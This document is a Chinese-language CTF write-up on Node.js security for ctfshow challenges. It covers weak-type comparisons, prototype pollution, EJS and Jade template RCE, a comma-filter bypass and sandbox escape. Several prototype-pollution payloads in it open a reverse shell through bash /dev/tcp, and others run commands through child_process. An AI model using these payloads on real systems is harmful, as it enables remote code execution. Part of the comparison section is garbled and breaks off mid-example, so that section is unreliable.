Nodejs的安全学习

Nodejs Nodejs的文档

http://nodejs.cn/learn

弱类型 大小写比较

跟php比较相似

console.log(1=='1'); //true
console.log(1>'2'); //false
console.log('1''3'); //true
console.log("ad">"v") //false
console.log('asd'>1); //false

总结：数字与字符串比较时：会优先将纯数字型字符串转为数字之后再进行比较；

字符串与字符串比较时：会将字符串的第一个字符转为ASCII码之后再进行比较；

而非数字型字符串与任何数字进行比较都是false。

数组的比较：

console.log([]==[]); //false
console.log([]>[]); //false
console.log([]>[]); //false
console.log([6,2]>[5]); //true
console.log([100,2] Object.prototype ,就造成原型链污染了。
 
非预期的payload、
 
ejs rce具体的来看下大佬写的文章https://xz.aliyun.com/t/7184
 
{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"');var __tmp2"}}
 
{"constructor/prototype/outputFunctionName": "a; return global.process.mainModule.constructor._load(\"child_process\").execSync(\"xxx\"); //"}
 
先将payload在login界面的post-body部分
 
post访问url/api就可以反弹shell了(一定要post)
 
 
web340 
不同之处
 
var flag='flag_here';
var user = new function(){
  this.userinfo = new function(){
    this.isVIP = false;
    this.isAdmin = false;
    this.isAuthor = false;     
  };
}
utils.copy(user.userinfo,req.body);
if(user.userinfo.isAdmin){
  res.end(flag);
}
 
 
需要上跳两级才能到object
 
所有payload
 
{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"')"}}}
 
web341 
预期解ejs rce payload:
 
{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"');var __tmp2"}}}
 
然后访问界面
 
web342，343 
jade原型链污染
 
参考链接https://xz.aliyun.com/t/7025
 
payload
 
{"__proto__":{"__proto__": {"type":"Block","nodes":"","compileDebug":1,"self":1,"line":"global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/810>&1\"')"}}}

{"__proto__":{"__proto__": {"type":"Code","compileDebug":1,"self":1,"line":"0, \"\" ));return global.process.mainModule.constructor._load('child_process').execSync('whoami', function(){} );jade_debug.unshift(new jade.DebugItem(0"}}}

{"__proto__":{"__proto__": {"type":"MixinBlock","compileDebug":1,"self":1,"line":"0, \"\" ));return global.process.mainModule.constructor._load('child_process').execSync('whoami', function(){} );//"}}}

{"__proto__":{"__proto__": {"type":"Doctype","compileDebug":1,"self":1,"line":"0, \"\" ));return global.process.mainModule.constructor._load('child_process').execSync('whoami', function(){} );//"}}}

{"__proto__":{"__proto__": {"type":"Doctype","compileDebug":1,"self":1,"line":"0, \"\" ));return global.process.mainModule.constructor._load('child_process').execSync('calc');//"}}}
 
web344 
router.get('/', function(req, res, next) {
 res.type('html');
 var flag = 'flag_here';
 if(req.url.match(/8c|2c|\,/ig)){
 	res.end('where is flag :)');
 }
 var query = JSON.parse(req.query.query);
 if(query.name==='admin'&&query.password==='ctfshow'&&query.isVIP===true){
 	res.end(flag);
 }else{
 	res.end('where is flag. :)');
 }

});

 
根据源码我们正常情况下需要传?query={"name":"admin","password":"ctfshow","isVIP":true}但是题目把逗号和他的url编码给过滤掉了，所以需要绕过。 payload:?query={"name":"admin"&query="password":"%63tfshow"&query="isVIP":true} nodejs中会把这三部分拼接起来，为什么把ctfshow中的c编码呢，因为双引号的url编码是%22再和c连接起来就是%22c，会匹配到正则表达式。
 
VM沙盒逃逸 
知识点 
沙箱逃逸
 
CTF题目 
[GKCTF2020]EZ 三剑客
 
参考文献 
https://xz.aliyun.com/t/7184#toc-8
 
http://www.yongsheng.site/2021/11/16/ctfshow%20nodejs/